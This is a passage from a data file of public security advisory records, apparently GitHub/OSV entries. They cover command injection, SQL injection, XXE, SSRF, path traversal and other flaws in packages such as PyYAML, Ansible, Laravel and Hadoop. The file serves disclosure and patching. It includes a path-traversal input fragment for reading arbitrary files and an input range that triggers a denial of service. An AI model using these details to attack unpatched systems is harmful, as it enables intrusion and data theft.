{'last_known_affected_version_range': '<= 6.3.5.2'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-88rc-3p98-rgvx'}]","{'cwe_ids': ['CWE-668'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T22:33:13Z', 'nvd_published_at': None}" +1.4.0,GHSA-vf26-7gjf-f92r,2021-04-08T20:03:52Z,2021-04-13T15:23:29Z,,['CVE-2019-10796'],OS Command Injection in rpi,rpi through 0.0.3 allows execution of arbritary commands. The variable pinNumbver in function GPIO within src/lib/gpio.js is used as part of the arguement of exec function without any sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'rpi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10796'}, {'type': 'WEB', 'url': 'https://github.com/xseignard/rpi/blob/master/src/lib/gpio.js#L47'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-RPI-548942'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T20:03:52Z', 'nvd_published_at': '2020-02-24T18:15:00Z'}" +1.4.0,GHSA-6757-jp84-gxfx,2022-07-29T18:40:16Z,2021-04-20T16:14:24Z,,['CVE-2020-1747'],Improper Input Validation in PyYAML,"A vulnerability was discovered in the PyYAML library in versions before 5.3.1, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pyyaml'}, 'ecosystem_specific': {'affected_functions': ['yaml.load', 'yaml.full_load', 'yaml.FullLoader']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1747'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/pull/386'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/commit/5080ba513377b6355a0502104846ee804656f1e0'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1747'}, {'type': 'PACKAGE', 'url': 'https://github.com/yaml/pyyaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7PPAS6C4SZRDQLR7C22A5U3QOLXY33JX/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K5HEPD7LEVDPCITY5IMDYWXUMX37VFMY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMQXSZXNJT6ERABJZAAICI3DQSQLCP3D/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WORRFHPQVAFKKXXWLSSW6XKUYLWM6CSH/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBJA3SGNJKCAYPSHOHWY3KBCWNM5NYK2/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00017.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00017.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T22:29:00Z', 'nvd_published_at': '2020-03-24T15:15:00Z'}" +1.4.0,GHSA-fvrf-9428-527m,2021-04-30T20:20:59Z,2021-04-22T16:11:01Z,,['CVE-2021-21427'],Backport for CVE-2021-21024 Blind SQLi from Magento 2,"### Impact +This vulnerability allows an administrator unauthorized access to restricted resources. + +We fixed a vulnerability in the MySQL adapter to prevent SQL injection attacks. This is a backport of CVE-2021-21024 https://helpx.adobe.com/security/products/magento/apsb21-08.html. + + +### Patches +_Has the problem been patched? What versions should users upgrade to?_ +> v20.0.9 v19.4.13","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 19.4.12'}}, {'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 20.0.8'}}]","[{'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/security/advisories/GHSA-fvrf-9428-527m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21427'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T21:06:43Z', 'nvd_published_at': '2021-04-21T21:15:00Z'}" +1.4.0,GHSA-j2h6-73x8-22c4,2023-08-31T20:44:29Z,2021-04-20T16:43:53Z,,['CVE-2020-1746'],Exposure of Sensitive Information to an Unauthorized Actor in ansible,A flaw was found in the Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when the ldap_attr and ldap_entry community modules are used. The issue discloses the LDAP bind password to stdout or a log file if a playbook task is written using the `bind_pw` in the parameters field. The highest threat from this vulnerability is data confidentiality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.17'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.11'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1746'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/67866'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/67866/commits/0ff609f1bc5e391fa25710b9a0baaf669f347eb1'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1746'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T22:47:04Z', 'nvd_published_at': '2020-05-12T18:15:00Z'}" +1.4.0,GHSA-6q4w-3wp4-q5wf,2022-05-03T02:57:48Z,2021-04-13T15:15:57Z,,['CVE-2021-27191'],Denial of Service in get-ip-range,"The get-ip-range package before 4.0.0 for Node.js is vulnerable to denial of service (DoS) if the range is untrusted input. An attacker could send a large range (such as 128.0.0.0/1) that causes resource exhaustion. Update get-ip-range dependency to 4.0.0 or above. + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'get-ip-range'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27191'}, {'type': 'WEB', 'url': 'https://github.com/JoeScho/get-ip-range/commit/98ca22b815c77273cbab259811ab0976118e13b6'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4304'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210319-0002/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/get-ip-range'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T22:50:19Z', 'nvd_published_at': '2021-02-11T18:15:00Z'}" +1.4.0,GHSA-gwp7-vqr5-h33h,2023-08-07T13:01:27Z,2021-04-20T16:13:45Z,,['CVE-2020-35678'],Open Redirect in autobahn,Autobahn|Python before 20.12.3 allows redirect header injection.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'autobahn'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.12.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35678'}, {'type': 'WEB', 'url': 'https://github.com/crossbario/autobahn-python/pull/1439'}, {'type': 'WEB', 'url': 'https://autobahn.readthedocs.io/en/latest/changelog.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossbario/autobahn-python'}, {'type': 'WEB', 'url': 'https://github.com/crossbario/autobahn-python/compare/v20.12.2...v20.12.3'}, {'type': 'WEB', 'url': 'https://pypi.org/project/autobahn/20.12.3/'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T22:27:56Z', 'nvd_published_at': '2020-12-27T00:15:00Z'}" +1.4.0,GHSA-rhh9-cm65-3w54,2021-10-05T16:27:33Z,2021-04-30T17:29:30Z,,['CVE-2018-11765'],Improper Authentication in Apache Hadoop,"In Apache Hadoop versions 3.0.0-alpha2 to 3.0.0, 2.9.0 to 2.9.2, 2.8.0 to 2.8.5, any users can access some servlets without authentication when Kerberos authentication is enabled and SPNEGO through HTTP is not enabled.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.hadoop:hadoop-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0-alpha2'}, {'fixed': '3.0.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.hadoop:hadoop-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.2'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.hadoop:hadoop-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.8.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-11765'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r17d94d132b207dad221595fd8b8b18628f5f5ec7e3f5be939ecd8928@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2c7f899911a04164ed1707083fcd4135f8427e04778c87d83509b0da%40%3Cgeneral.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r46447f38ea8c89421614e9efd7de5e656186d35e10fc97cf88477a01@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4dddf1705dbedfa94392913b2dad1cd2d1d89040facd389eea0b3510@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r74825601e93582167eb7cdc2f764c74c9c6d8006fa90018562fda60f@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r79b15c5b66c6df175d01d7560adf0cd5c369129b9a161905e0339927@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb21df54a4e39732ce653d2aa5672e36a792b59eb6717f2a06bb8d02a@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb241464d83baa3749b08cd3dabc8dba70a9a9027edcef3b5d4c24ef4@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbe25cac0f499374f8ae17a4a44a8404927b56de28d4c41940d82b7a4@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reea5eb8622afbfbfca46bc758f79db83d90a3263a906c4d1acba4971@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf9dfa8b77585c9227db9637552eebb2ab029255a0db4eb76c2b6c4cf@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20201016-0005/'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T21:56:41Z', 'nvd_published_at': '2020-09-30T18:15:00Z'}" +1.4.0,GHSA-rjmf-p882-645m,2021-04-12T18:51:10Z,2021-04-12T18:51:17Z,,['CVE-2021-20327'],Improper Certificate Validation,"A specific version of the Node.js mongodb-client-encryption module does not perform correct validation of the KMS server’s certificate. This vulnerability in combination with a privileged network position active MITM attack could result in interception of traffic between the Node.js driver and the KMS service rendering client-side field level encryption (CSFLE) ineffective. This issue was discovered during internal testing and affects mongodb-client-encryption module version 1.2.0, which was available from 2021-Jan-29 and deprecated in the NPM Registry on 2021-Feb-04. This vulnerability does not impact driver traffic payloads with CSFLE-supported key services from applications residing inside the AWS, GCP, and Azure nework fabrics due to compensating controls in these environments. This issue does not impact driver workloads that don’t use Field Level Encryption.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'mongodb-client-encryption'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.1'}]}], 'versions': ['1.2.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20327'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/libmongocrypt/commit/76365515ff8754b9f705e56428dd0d7efa7f541b'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/NODE-3125'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1660'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T00:00:28Z', 'nvd_published_at': '2021-02-25T17:15:00Z'}" +1.4.0,GHSA-q348-f93x-9gx4,2021-04-28T22:29:16Z,2021-04-29T21:53:06Z,,['CVE-2021-30492'],Lack of Input Validation in zendesk_api_client_php for Zendesk Subdomain,"### Impact +Lack of input validation of the Zendesk subdomain could expose users of the library to Server Side Request Forgery (SSRF). + +### Resolution +Validate the provided Zendesk subdomain to be a valid subdomain in: +* getAuthUrl +* getAccessToken",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'zendesk/zendesk_api_client_php'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zendesk/zendesk_api_client_php/security/advisories/GHSA-q348-f93x-9gx4'}, {'type': 'WEB', 'url': 'https://github.com/zendesk/zendesk_api_client_php/pull/466'}, {'type': 'WEB', 'url': 'https://github.com/zendesk/zendesk_api_client_php/commit/b451b743d9d6d81a9abf7cb86e70ec9c5332123e'}]","{'cwe_ids': ['CWE-20', 'CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T22:29:16Z', 'nvd_published_at': None}" +1.4.0,GHSA-hxmg-hm46-cf62,2023-09-12T19:23:11Z,2021-04-13T15:41:01Z,,['CVE-2020-24391'],Remote code execution in mongo-express,mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mongodb-query-parser'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24391'}, {'type': 'WEB', 'url': 'https://github.com/mongodb-js/query-parser/issues/16'}, {'type': 'WEB', 'url': 'https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T20:14:37Z', 'nvd_published_at': '2021-03-30T21:15:00Z'}" +1.4.0,GHSA-22cm-3qf2-2wc7,2021-04-01T23:39:38Z,2021-04-13T15:30:27Z,,['CVE-2021-23335'],LDAP Injection in is-user-valid,All versions of package is-user-valid are vulnerable to LDAP Injection which can lead to either authentication bypass or information exposure.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'is-user-valid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23335'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ISUSERVALID-1056766'}]","{'cwe_ids': ['CWE-74', 'CWE-90'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-01T23:39:38Z', 'nvd_published_at': '2021-02-11T12:15:00Z'}" +1.4.0,GHSA-hxp5-8pgq-mgv9,2021-04-21T20:27:19Z,2021-04-22T16:14:14Z,,['CVE-2020-13955'],Missing Authentication for Critical Function in Apache Calcite,"""HttpUtils#getURLConnection method disables explicitly hostname verification for HTTPS connections making clients vulnerable to man-in-the-middle attacks. Calcite uses this method internally to connect with Druid and Splunk so information leakage may happen when using the respective Calcite adapters. The method itself is in a utility class so people may use it to create vulnerable HTTPS connections for other applications. From Apache Calcite 1.26 onwards, the hostname verification will be performed using the default JVM truststore.""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.calcite:calcite-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.26.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.calcite:calcite-druid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.26.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.calcite:calcite-splunk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.26.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13955'}, {'type': 'WEB', 'url': 'https://github.com/apache/calcite/commit/43eeafcbac29d02c72bd520c003cdfc571de2d15'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/CALCITE-4298'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b0fbe2038388175951ce1028182d980f9e9a7328be13d52dab70bb3%40%3Cdev.calcite.apache.org%3E'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T20:27:19Z', 'nvd_published_at': '2020-10-09T13:15:00Z'}" +1.4.0,GHSA-2c8c-84w2-j38j,2021-04-07T19:33:49Z,2021-04-07T21:14:00Z,,['CVE-2020-28736'],Improper Restriction of XML External Entity Reference in Plone,"Plone before 5.2.3 allows XXE attacks via a feature that is protected by an unapplied permission of plone.schemaeditor.ManageSchemata (therefore, only available to the Manager role).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.event'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.theming'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.dexterity'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.8'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.supermodel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28736'}, {'type': 'WEB', 'url': 'https://github.com/plone/Products.CMFPlone/issues/3209'}, {'type': 'WEB', 'url': 'https://dist.plone.org/release/5.2.3/RELEASE-NOTES.txt'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T19:33:49Z', 'nvd_published_at': '2020-12-30T19:15:00Z'}" +1.4.0,GHSA-frpw-jrwx-hcfv,2023-09-07T22:38:20Z,2021-04-13T15:30:00Z,,['CVE-2021-25864'],Path Traversal in node-red-contrib-huemagic,"node-red-contrib-huemagic 3.0.0 is affected by `hue/assets/..%2F` Directory Traversal.in the `res.sendFile` API, used in file hue-magic.js, to fetch an arbitrary file.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-red-contrib-huemagic'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25864'}, {'type': 'WEB', 'url': 'https://github.com/Foddy/node-red-contrib-huemagic/issues/217'}, {'type': 'PACKAGE', 'url': 'https://github.com/Foddy/node-red-contrib-huemagic'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T23:24:50Z', 'nvd_published_at': '2021-01-26T18:16:00Z'}" +1.4.0,GHSA-9mrv-456v-pf22,2021-03-22T23:06:41Z,2021-04-13T15:19:50Z,,['CVE-2020-28487'],Cross-site Scripting in vis-timeline,"This affects the package vis-timeline before 7.4.4. + An attacker with the ability to control the items of a Timeline element can inject additional script code into the generated application.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'vis-timeline'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.4.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28487'}, {'type': 'WEB', 'url': 'https://github.com/visjs/vis-timeline/issues/838'}, {'type': 'WEB', 'url': 'https://github.com/visjs/vis-timeline/pull/840'}, {'type': 'WEB', 'url': 'https://github.com/visjs/vis-timeline/commit/a7ca349c7b3b6080efd05776ac77bb27176d4d3f'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBVISJS-1063502'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1063501'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-VISTIMELINE-1063500'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:06:41Z', 'nvd_published_at': '2021-01-22T18:15:00Z'}" +1.4.0,GHSA-4mg9-vhxq-vm7j,2021-11-18T19:46:31Z,2021-04-29T21:52:53Z,,[],SQL Server LIMIT / OFFSET SQL Injection in laravel/framework and illuminate/database,"### Impact + +Those using SQL Server with Laravel and allowing user input to be passed directly to the `limit` and `offset` functions are vulnerable to SQL injection. Other database drivers such as MySQL and Postgres are not affected by this vulnerability. + +### Patches + +This problem has been patched on Laravel versions 6.20.26, 7.30.5, and 8.40.0. + +### Workarounds + +You may workaround this vulnerability by ensuring that only integers are passed to the `limit` and `offset` functions, as well as the `skip` and `take` functions. +",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.40.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.20.26'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'illuminate/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.40.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'illuminate/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.20.26'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/laravel/framework/security/advisories/GHSA-4mg9-vhxq-vm7j'}, {'type': 'PACKAGE', 'url': 'https://github.com/laravel/framework'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/illuminate/database'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/laravel/framework'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T20:17:07Z', 'nvd_published_at': None}" +1.4.0,GHSA-prv2-xwr7-hr57,2021-04-08T20:19:06Z,2021-04-13T15:23:21Z,,['CVE-2019-10798'],Uncontrolled Resource Consumption in rdf-graph-array,rdf-graph-array through 0.3.0-rc6 manipulation of JavaScript objects resutling in Prototype Pollution. The rdf.Graph.prototype.add method could be tricked into adding or modifying properties of Object.prototype.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'rdf-graph-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.3.0-rc6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10798'}, {'type': 'WEB', 'url': 'https://github.com/rdf-ext-archive/rdf-graph-array/blob/master/index.js#L211'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-RDFGRAPHARRAY-551803'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T20:19:06Z', 'nvd_published_at': '2020-02-24T18:15:00Z'}" +1.4.0,GHSA-m429-fhmv-c6q2,2023-08-31T21:46:29Z,2021-04-20T16:44:07Z,,['CVE-2020-14365'],Improper Verification of Cryptographic Signature in ansible,"A flaw was found in the Ansible Engine, in ansible-engine 2.8.x before 2.8.15 and ansible-engine 2.9.x before 2.9.13, when installing packages using the dnf module. GPG signatures are ignored during installation even when `disable_gpg_check` is set to `False`, which is the default behavior. This flaw leads to malicious packages being installed on the system and arbitrary code executed via package installation scripts. The highest threat from this vulnerability is to integrity and system availability.","[{'type': 'CVSS_V3', 'score': 